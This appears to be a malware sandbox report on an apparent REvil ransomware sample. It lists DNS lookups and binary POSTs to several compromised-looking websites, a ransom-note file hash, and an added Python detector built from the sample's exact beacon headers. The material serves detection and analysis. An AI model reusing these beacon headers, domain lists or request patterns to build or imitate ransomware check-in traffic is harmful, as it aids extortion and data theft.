        Remote address:
        8.8.8.8:53
        Request
        lidkopingsnytt.nu
        IN A
      • flag-us
        DNS
        lidkopingsnytt.nu
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        lidkopingsnytt.nu
        IN A
      • flag-us
        DNS
        lidkopingsnytt.nu
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        8.8.8.8:53
        Request
        lidkopingsnytt.nu
        IN A
      • flag-se
        POST
        https://lidkopingsnytt.nu/wp-content/pictures/idjpbykasrxz.gif
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        Remote address:
        185.189.49.45:443
        Request
        POST /wp-content/pictures/idjpbykasrxz.gif HTTP/1.1
        Cache-Control: no-cache
        Connection: close
        Pragma: no-cache
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
        Content-Length: 928
        Host: lidkopingsnytt.nu
      • flag-us
        DNS
        45.49.189.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        45.49.189.185.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        45.49.189.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        45.49.189.185.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        45.49.189.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        45.49.189.185.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        45.49.189.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        45.49.189.185.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        45.49.189.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        45.49.189.185.in-addr.arpa
        IN PTR
      • flag-us
        DNS
        18.173.189.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        18.173.189.20.in-addr.arpa
        IN PTR
        Response
      • 62.113.229.82:443
        https://speiserei-hannover.de/news/pictures/xdts.gif
        tls, http
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        8.4kB
        3.4kB
        17
        9

        HTTP Request

        POST https://speiserei-hannover.de/news/pictures/xdts.gif

        HTTP Response

        404
      • 62.221.214.138:443
        https://subyard.com/wp-content/pics/kuobnopwoa.gif
        tls, http
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        2.0kB
        5.1kB
        10
        11

        HTTP Request

        POST https://subyard.com/wp-content/pics/kuobnopwoa.gif

        HTTP Response

        405
      • 185.135.241.6:443
        https://martha-frets-ceramics.nl/content/image/eomhlxhguw.gif
        tls, http
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        3.2kB
        29.2kB
        26
        27

        HTTP Request

        POST https://martha-frets-ceramics.nl/content/image/eomhlxhguw.gif

        HTTP Response

        404
      • 101.99.77.144:443
        hostastay.com
        tls
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        1.1kB
        1.6kB
        12
        6
      • 101.99.77.144:443
        hostastay.com
        tls
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        512 B
        610 B
        8
        4
      • 101.99.77.144:443
        hostastay.com
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        346 B
        92 B
        7
        2
      • 76.223.67.189:443
        https://luvbec.com/wp-content/pictures/tbcwfh.jpg
        tls, http
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        2.2kB
        4.9kB
        13
        16

        HTTP Request

        POST https://luvbec.com/wp-content/pictures/tbcwfh.jpg

        HTTP Response

        405
      • 85.10.159.84:443
        https://dayenne-styling.nl/include/images/njwqni.png
        tls, http
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        1.9kB
        4.5kB
        9
        9

        HTTP Request

        POST https://dayenne-styling.nl/include/images/njwqni.png

        HTTP Response

        500
      • 146.148.139.87:443
        111firstdelray.com
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        260 B
        80 B
        5
        2
      • 185.189.49.45:443
        https://lidkopingsnytt.nu/wp-content/pictures/idjpbykasrxz.gif
        tls, http
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        1.8kB
        3.2kB
        7
        6

        HTTP Request

        POST https://lidkopingsnytt.nu/wp-content/pictures/idjpbykasrxz.gif
      • 8.8.8.8:53
        8.8.8.8.in-addr.arpa
        dns
        198 B
        90 B
        3
        1

        DNS Request

        8.8.8.8.in-addr.arpa

        DNS Request

        8.8.8.8.in-addr.arpa

        DNS Request

        8.8.8.8.in-addr.arpa

      • 8.8.8.8:53
        196.249.167.52.in-addr.arpa
        dns
        365 B
        5

        DNS Request

        196.249.167.52.in-addr.arpa

        DNS Request

        196.249.167.52.in-addr.arpa

        DNS Request

        196.249.167.52.in-addr.arpa

        DNS Request

        196.249.167.52.in-addr.arpa

        DNS Request

        196.249.167.52.in-addr.arpa

      • 8.8.8.8:53
        8.8.8.8.in-addr.arpa
        dns
        264 B
        90 B
        4
        1

        DNS Request

        8.8.8.8.in-addr.arpa

        DNS Request

        8.8.8.8.in-addr.arpa

        DNS Request

        8.8.8.8.in-addr.arpa

        DNS Request

        8.8.8.8.in-addr.arpa

      • 8.8.8.8:53
        149.220.183.52.in-addr.arpa
        dns
        73 B
        147 B
        1
        1

        DNS Request

        149.220.183.52.in-addr.arpa

      • 8.8.8.8:53
        speiserei-hannover.de
        dns
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        67 B
        83 B
        1
        1

        DNS Request

        speiserei-hannover.de

        DNS Response

        62.113.229.82

      • 8.8.8.8:53
        82.229.113.62.in-addr.arpa
        dns
        144 B
        115 B
        2
        1

        DNS Request

        82.229.113.62.in-addr.arpa

        DNS Request

        82.229.113.62.in-addr.arpa

      • 8.8.8.8:53
        delegationhub.com
        dns
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        63 B
        136 B
        1
        1

        DNS Request

        delegationhub.com

      • 8.8.8.8:53
        136.32.126.40.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        136.32.126.40.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        subyard.com
        dns
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        57 B
        73 B
        1
        1

        DNS Request

        subyard.com

        DNS Response

        62.221.214.138

      • 8.8.8.8:53
        martha-frets-ceramics.nl
        dns
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        70 B
        86 B
        1
        1

        DNS Request

        martha-frets-ceramics.nl

        DNS Response

        185.135.241.6

      • 8.8.8.8:53
        138.214.221.62.in-addr.arpa
        dns
        73 B
        133 B
        1
        1

        DNS Request

        138.214.221.62.in-addr.arpa

      • 8.8.8.8:53
        6.241.135.185.in-addr.arpa
        dns
        72 B
        107 B
        1
        1

        DNS Request

        6.241.135.185.in-addr.arpa

      • 8.8.8.8:53
        hostastay.com
        dns
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        59 B
        75 B
        1
        1

        DNS Request

        hostastay.com

        DNS Response

        101.99.77.144

      • 8.8.8.8:53
        50.23.12.20.in-addr.arpa
        dns
        70 B
        156 B
        1
        1

        DNS Request

        50.23.12.20.in-addr.arpa

      • 8.8.8.8:53
        217.106.137.52.in-addr.arpa
        dns
        219 B
        147 B
        3
        1

        DNS Request

        217.106.137.52.in-addr.arpa

        DNS Request

        217.106.137.52.in-addr.arpa

        DNS Request

        217.106.137.52.in-addr.arpa

      • 8.8.8.8:53
        144.77.99.101.in-addr.arpa
        dns
        144 B
        102 B
        2
        1

        DNS Request

        144.77.99.101.in-addr.arpa

        DNS Request

        144.77.99.101.in-addr.arpa

      • 8.8.8.8:53
        206.23.85.13.in-addr.arpa
        dns
        142 B
        145 B
        2
        1

        DNS Request

        206.23.85.13.in-addr.arpa

        DNS Request

        206.23.85.13.in-addr.arpa

      • 8.8.8.8:53
        19.229.111.52.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        19.229.111.52.in-addr.arpa

      • 8.8.8.8:53
        92.12.20.2.in-addr.arpa
        dns
        69 B
        131 B
        1
        1

        DNS Request

        92.12.20.2.in-addr.arpa

      • 8.8.8.8:53
        81.144.22.2.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        81.144.22.2.in-addr.arpa

      • 8.8.8.8:53
        luvbec.com
        dns
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        56 B
        88 B
        1
        1

        DNS Request

        luvbec.com

        DNS Response

        76.223.67.189
        13.248.213.45

      • 8.8.8.8:53
        dayenne-styling.nl
        dns
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        128 B
        80 B
        2
        1

        DNS Request

        dayenne-styling.nl

        DNS Request

        dayenne-styling.nl

        DNS Response

        85.10.159.84

      • 8.8.8.8:53
        189.67.223.76.in-addr.arpa
        dns
        72 B
        128 B
        1
        1

        DNS Request

        189.67.223.76.in-addr.arpa

      • 8.8.8.8:53
        84.159.10.85.in-addr.arpa
        dns
        71 B
        111 B
        1
        1

        DNS Request

        84.159.10.85.in-addr.arpa

      • 8.8.8.8:53
        73.144.22.2.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        73.144.22.2.in-addr.arpa

      • 8.8.8.8:53
        111firstdelray.com
        dns
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        128 B
        80 B
        2
        1

        DNS Request

        111firstdelray.com

        DNS Request

        111firstdelray.com

        DNS Response

        146.148.139.87

      • 8.8.8.8:53
        18.173.189.20.in-addr.arpa
        dns
        144 B
        158 B
        2
        1

        DNS Request

        18.173.189.20.in-addr.arpa

        DNS Request

        18.173.189.20.in-addr.arpa

      • 8.8.8.8:53
        lidkopingsnytt.nu
        dns
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        252 B
        79 B
        4
        1

        DNS Request

        lidkopingsnytt.nu

        DNS Request

        lidkopingsnytt.nu

        DNS Request

        lidkopingsnytt.nu

        DNS Request

        lidkopingsnytt.nu

        DNS Response

        185.189.49.45

      • 8.8.8.8:53
        45.49.189.185.in-addr.arpa
        dns
        360 B
        5

        DNS Request

        45.49.189.185.in-addr.arpa

        DNS Request

        45.49.189.185.in-addr.arpa

        DNS Request

        45.49.189.185.in-addr.arpa

        DNS Request

        45.49.189.185.in-addr.arpa

        DNS Request

        45.49.189.185.in-addr.arpa

      • 8.8.8.8:53
        18.173.189.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        18.173.189.20.in-addr.arpa
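
Every HTTP exchange in the capture has the same shape: a POST with a 928-byte application/octet-stream body to a path that looks like a static image under a pictures/images directory on an unrelated, mostly WordPress, site, sent with Cache-Control and Pragma set to no-cache, Connection: close, and a hard-coded "Windows NT 5.1 / Firefox 36" user agent from a Windows 10 guest. The servers answer 404, 405 or 500 and the sample simply moves on to the next domain, so none of these hosts is confirmed C2 infrastructure; this matches REvil's documented behaviour of posting its encrypted victim record to a long list of domains embedded in its configuration. A detection keyed on the request shape therefore travels better than one that blocks these six names. The Python below is an added example for this page, not part of the tria.ge report: it parses raw request heads, scores the per-request indicators and then groups POSTs by Content-Length across hosts. The request heads are reconstructed from the six POSTs shown above (their shared header block plus the six host/path pairs); the GET control request and its Chrome user agent are made up.

```python
import re
from collections import defaultdict

# Constructed sample. OBSERVED lists the (host, path) pairs of the six POSTs in this
# report and REVIL_HEADERS is the header block they all share, verbatim. CONTROL is a
# made-up ordinary browser image fetch included for contrast.
OBSERVED = [
    ("speiserei-hannover.de", "/news/pictures/xdts.gif"),
    ("subyard.com", "/wp-content/pics/kuobnopwoa.gif"),
    ("martha-frets-ceramics.nl", "/content/image/eomhlxhguw.gif"),
    ("luvbec.com", "/wp-content/pictures/tbcwfh.jpg"),
    ("dayenne-styling.nl", "/include/images/njwqni.png"),
    ("lidkopingsnytt.nu", "/wp-content/pictures/idjpbykasrxz.gif"),
]
REVIL_HEADERS = (
    "Cache-Control: no-cache\n"
    "Connection: close\n"
    "Pragma: no-cache\n"
    "Content-Type: application/octet-stream\n"
    "User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0\n"
    "Content-Length: 928\n"
    "Host: {host}\n"
)
CONTROL = (
    "GET /wp-content/uploads/logo.png HTTP/1.1\n"
    "Host: example.com\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36\n"
    "Accept: image/avif,image/webp,*/*\n"
    "Connection: keep-alive\n"
)
SAMPLE_REQUESTS = [f"POST {path} HTTP/1.1\n" + REVIL_HEADERS.format(host=host)
                   for host, path in OBSERVED] + [CONTROL]

# A static-looking image path (random lowercase name under some images directory)
# that nevertheless receives a POST with a binary body.
IMAGE_PATH_RE = re.compile(r"^/(?:[\w-]+/)+[a-z]{3,20}\.(?:gif|jpg|png)$")
STALE_UA_RE = re.compile(r"Windows NT 5\.1.*Firefox/36\.0")   # XP-era UA hard-coded in the sample


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request head into (method, path, headers); header names lower-cased."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def score_request(raw: str) -> list:
    """Return the per-request indicators that match; three or more is treated as a beacon."""
    method, path, h = parse_request(raw)
    hits = []
    if method == "POST" and IMAGE_PATH_RE.match(path):
        hits.append("post_to_image_path")
    if h.get("content-type") == "application/octet-stream":
        hits.append("octet_stream_body")
    if STALE_UA_RE.search(h.get("user-agent", "")):
        hits.append("stale_firefox_ua")
    if (h.get("cache-control") == "no-cache" and h.get("pragma") == "no-cache"
            and h.get("connection", "").lower() == "close"):
        hits.append("no_cache_close")
    return hits


def is_revil_beacon(raw: str) -> bool:
    return len(score_request(raw)) >= 3


def spray_hosts(raws, min_hosts: int = 3) -> dict:
    """Group POSTs by Content-Length. The same body size sent to many unrelated hosts is
    the domain-spray pattern, independent of which domains the configuration carries."""
    by_len = defaultdict(set)
    for raw in raws:
        method, _, h = parse_request(raw)
        if method == "POST" and "content-length" in h:
            by_len[h["content-length"]].add(h["host"])
    return {n: sorted(hosts) for n, hosts in by_len.items() if len(hosts) >= min_hosts}
```

The per-request score is deliberately tolerant: a single indicator such as the stale user agent also appears in legitimate traffic from old scanners, but three of the four together on one request are hard to explain away. The aggregate check is the more robust of the two, since the body size is a property of the victim record rather than of the sample's header choices, and it keeps working when a later build changes the user agent or the path scheme.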

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\7m7n045-readme.txt

        Filesize

        6KB

        MD5

        e2b0be8292e176f123e908d509a600f9

        SHA1

        8e726f8a76e54a409c15a9d0d6ede1fede442e52

        SHA256

        e5d0b044e0504848674acf2484fa90744a52b6d3f528eeb532853bd5bc31a8e7

        SHA512

        3fc8da1f1c2d929814de0ee9a2e08ccd6e8d5a54c81bba2ea67e57c69e09305e8d155470cd6605ca2def7522810ed3cb7d1ce0662d2829c91ce18b6915745da6
